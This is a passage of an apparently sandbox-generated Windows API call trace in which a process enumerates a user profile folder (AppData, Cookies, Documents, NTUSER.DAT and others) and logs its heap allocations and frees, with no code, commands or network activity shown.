ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0090.996] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.996] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0090.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb720 [0090.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31eef28 [0090.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb720 | out: hHeap=0x680000) returned 1 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb408 | out: hHeap=0x680000) returned 1 [0090.997] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759860 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x7597f8 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7540 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb4b8 | out: hHeap=0x680000) returned 1 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759728 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x7597f8 | out: hHeap=0x680000) returned 1 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759860 | out: hHeap=0x680000) returned 1 [0090.997] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb720 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9c28 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb510 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759860 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb408 | out: hHeap=0x680000) returned 1 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759728 | out: hHeap=0x680000) returned 1 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c7540 | out: hHeap=0x680000) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb720 | out: hHeap=0x680000) returned 1 [0090.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb4b8 | out: hHeap=0x680000) returned 1 [0090.997] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb720 [0090.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759728 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb5c0 [0090.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0090.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759860 | out: hHeap=0x680000) returned 1 [0090.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb408 | out: hHeap=0x680000) returned 1 [0090.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb720 | out: hHeap=0x680000) returned 1 [0090.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a5807e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8a5807e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb720 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb510 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759860 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb618 [0090.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f914cd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f914cd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cac00 [0090.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cac00 [0090.999] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cac00 [0090.999] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb618 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0090.999] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759728 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x3112760 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d840 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb618 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb510 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb6c8 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d7d8 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0090.999] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f9d33b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f9d33b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0090.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb5c0 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759728 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x7597f8 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb720 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0091.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fca6dd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fca6dd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x214) returned 0x3165e90 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb4b8 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759728 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb778 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb7d0 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb828 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x7597f8 [0091.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d430 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb880 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db18 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb8d8 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db80 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb930 [0091.001] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cac00 [0091.001] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb5c0 [0091.001] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d7d8 [0091.001] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.001] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.001] RtlAllocateHeap 